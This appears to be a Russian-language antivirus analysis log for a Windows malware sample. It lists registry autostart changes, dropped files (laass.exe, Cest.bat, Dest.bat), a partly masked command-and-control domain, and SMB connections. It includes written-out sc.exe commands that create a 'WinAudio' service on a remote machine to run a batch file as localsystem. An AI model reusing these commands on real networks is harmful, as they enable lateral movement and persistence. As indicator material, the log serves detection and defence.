Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\WinAudio] 'Start' = '00000002'
- '%PROGRAM_FILES%\%Program Files%\laass.exe' 1020.URL main
- '<SYSTEM32>\rundll32.exe' 1020.URL main
- '<SYSTEM32>\sc.exe' \\10.0.0.2 config "WinAudio" binpath= "cmd.exe /c %PROGRAM_FILES%\%Program Files%\Cest.bat" start= auto type= interact type= own obj= localsystem password= ""
- '<SYSTEM32>\cmd.exe' /c "%PROGRAM_FILES%\%Program Files%\Dest.bat"
- '<SYSTEM32>\sc.exe' \\10.0.0.2 create "WinAudio" binpath= "cmd.exe /c %PROGRAM_FILES%\%Program Files%\Cest.bat" start= auto type= interact type= own displayname= "WinAudio"
- %PROGRAM_FILES%\%Program Files%\Dest.BAt
- %PROGRAM_FILES%\%Program Files%\1020.URL
- \Device\LanmanRedirector\10.0.0.2\pipe\svcctl
- %PROGRAM_FILES%\%Program Files%\Cest.bat
- %PROGRAM_FILES%\%Program Files%\laass.exe
- %PROGRAM_FILES%\%Program Files%\1018.URL
- %PROGRAM_FILES%\%Program Files%\~
- 'oa###8.3322.org':1997
- '<IP-адрес в локальной сети>':139
- '<IP-адрес в локальной сети>':445
- DNS ASK oa###8.3322.org